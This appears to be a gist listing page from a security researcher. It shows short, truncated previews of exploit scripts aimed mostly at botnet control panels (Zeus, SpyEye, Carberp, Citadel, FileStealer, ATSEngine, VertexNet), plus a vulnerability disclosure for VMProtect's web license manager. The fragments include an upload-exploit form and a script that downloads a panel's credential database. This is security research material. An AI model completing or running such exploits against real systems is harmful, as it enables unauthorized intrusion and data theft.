Xyl2k’s gists

Xyl2k / Zeus mmbb builder v2.9.6.1 Config decoder

Created September 14, 2014 09:14

	<?php
	function decode($data, $key) {
	$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_ECB, '');
	$iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_RAND);

	mcrypt_generic_init($td, $key, $iv);
	mcrypt_generic($td, $data);

	$data = mdecrypt_generic($td, $data);

Xyl2k / SpyEye backdoor

Created September 14, 2014 09:17

	<?php
	// Xyl2k :þ
	// Thanks to EsSandre for the additional help.

	$MySQLI = array();

	/* MySQLI ID */

	$MySQLI['HOST'] = 'localhost';
	$MySQLI['USER'] = 'root';

Xyl2k / Carberp Remote code execution vulnerability

Created September 14, 2014 09:22

	<table width="607" border="0">
	<tr>
	<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
	<label for="carberp">Domain: </label>
	<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
	<input type="submit" name="button" id="button" value="Ownz !" />
	</form></td>
	</tr>
	<tr>
	<td><?php

Xyl2k / Rovnix hash collision vulnerability

Created September 14, 2014 09:23

	<?php
	/**
	* Defeat the weak hash function of Rovnix
	* to get password from a hash.
	*/

	$HASH = 'fbff791ef0770855e599ea6f87d41653';

	$value = getNumber($HASH);
	$search = search($value, $HASH);

Xyl2k / VMProtect Web License Manager 2.2.1 Multiple vulnerabilities

Created September 14, 2014 09:24

	<?php
	/**
	VMProtect Web License Manager 2.2.1 Multiple vulnerabilities
	------------------------------------------------------------
	Vendor site: http://vmpsoft.com/

	First contact............: 11/09/2013
	Vendor answer............: 12/09/2013
	Vendor fixed the RFI/XSS.: 08/11/2013
	Second contact for SQL...: 25/11/2013

Xyl2k / Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability

Created September 14, 2014 09:24

	import urllib
	import urllib2

	# Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability
	# Work only on windows box

	def request(url, params=None, method='GET'):
	if method == 'POST':
	urllib2.urlopen(url, urllib.urlencode(params)).read()
	elif method == 'GET':

Xyl2k / FileStealer v1.3 Upload Vulnerability

Created September 14, 2014 09:25

	<!-- FileStealer v1.3 panel upload vulnerability -->
	<!-- Panel hash: be19e93878130b2f57d42d4dcf5ffcf0 -->
	<form method="POST" action="http://localhost/panel/up.php" enctype="multipart/form-data">
	File: <input type="file" name="file" /> <br />
	HWID: <input type="text" name="hwid" value="COOFEEBABE" /> <br />
	Hash: <input type="text" name="hash" value="2c471313f06370d0866db1facb34668e" /><br />
	PC: <input type="text" name="pc" value="ANDROMAQUE" /> <br />
	<input type="hidden" name="step" value="1337" />
	<input type="submit" value="Pwn" />
	</form>

Xyl2k / ATSEngine credential disclosure vulnerability

Created September 14, 2014 09:26

	<pre>
	<?php
	$url = getURL();

	if ($url !== NULL) {
	$database = @file_get_contents($url . '/db/database.db');

	if ($database !== FALSE) {
	file_put_contents('tmp.db', $database);

Xyl2k / VertexNet v1.1.1 Flood Bots

Created September 14, 2014 09:29

	#!/usr/bin/perl
	# VertexNet v1.1.1 Flood Bots
	# http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791
	# Xyl2k! :þ

	use HTTP::Request;
	use LWP::UserAgent;

	$URL = "http://localhost/Panel/adduser.php";

Xyl2k / Soraya XSS Vulnerability

Created September 14, 2014 09:31

Steven K Xyl2k